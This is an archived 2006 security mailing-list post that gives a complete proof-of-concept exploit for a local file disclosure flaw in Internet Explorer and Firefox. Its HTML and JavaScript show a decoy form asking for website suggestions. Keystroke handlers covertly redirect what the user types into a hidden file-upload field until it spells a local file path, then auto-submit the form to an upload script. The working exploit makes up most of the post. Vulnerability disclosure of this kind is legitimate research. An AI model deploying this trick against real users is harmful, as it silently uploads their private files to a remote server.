Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

From: <sirdarckcat_at_gmail.com>
Date: 11 Jun 2006 09:37:33 -0000
('binary' encoding is not supported, stored as-is) This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.

The subjects of the links sugested, are for forcing the user to input:
FILE
AUTOEXEC
BAT

so we can receive:
file://c:/autoexec.bat

and upload this file to a server.

This is a low risk vulnerability.

//--START HTML CODE--//
<html>
<body>
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
* OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
* by sirdarckcat [at] gmail [.] com
* from: elhacker.net
**/
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
var thefilew = "file://c:/autoexec.bat";
var dv = 0;
var chift = false;
var teo = document.forms[0].thet;
var feo = document.forms[0].other;

function checa(tecla) {
                var rt=(tecla.which)?tecla.which:event.keyCode;
                var lw=String.fromCharCode(rt);
                if (dv>=thefilew.length){
                        document.forms[0].submit();
                }
                if (rt == 16){
                        chift = true;
                }
                if (rt==thefilek[dv]){
                        if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
                                teo.disabled=false;
                                teo.style.visibility="visible";
                                teo.focus();
                                feo.value += thefilew[dv];
                                dv++;
                        }
                }else{
                        feo.focus();
                        teo.disabled=true;
                        teo.style.visibility="hidden";
                }
}
function solsh(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = false;
        }
}
function mprss(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = true;
        }
}
document.onkeydown = checa;
document.onkeyup = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net
Received on Jun 12 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos